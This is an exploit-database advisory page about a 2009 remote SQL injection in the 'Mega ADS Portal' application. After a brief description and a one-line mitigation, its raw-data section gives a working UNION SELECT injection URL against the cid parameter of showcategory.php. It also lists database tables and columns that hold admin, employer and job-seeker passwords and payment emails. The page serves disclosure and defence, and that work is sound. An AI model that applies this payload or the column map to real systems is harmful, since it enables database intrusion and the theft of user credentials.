header-logo
Suggest Exploit
vendor:
Mega ADS Portal
by:
Hussin X
9.8
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Mega ADS Portal
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Mega ADS Portal (cid) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in the Mega ADS Portal (cid) due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to gain access to sensitive information such as usernames, passwords, emails, and other confidential data stored in the database.

Mitigation:

The application should validate user-supplied input and sanitize it before using it in SQL queries.
Source

Exploit-DB raw data:

#   Mega ADS Portal (cid) Remote SQL Injection Vulnerability

#========================================================

#    Author: Hussin X

#    Home :  iq-ty.com/vb<http://iq-ty.com/vb>

#    email:  darkangel_g85[at]Yahoo[DoT]com


#    Vendor : http://www.preprojects.com/ads.asp



Exploit:


server/Script/showcategory.php?cid=-21+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6--

__________________________
table_name : column_name

configuration:paypal_email
configuration:vendorid
configuration:site_name
configuration:email
job_admin_login:aid
job_admin_login:apass
job_admin_login:name
job_admin_login:email
job_aplicants:job_id
job_education:uname
job_careerlevel:clname
job_employer_info:epass
job_employer_info:CompanyName
job_seeker_info:uname
job_seeker_info:upass
job_tempacc:user_id


end

 IQ-SecuritY FoRuM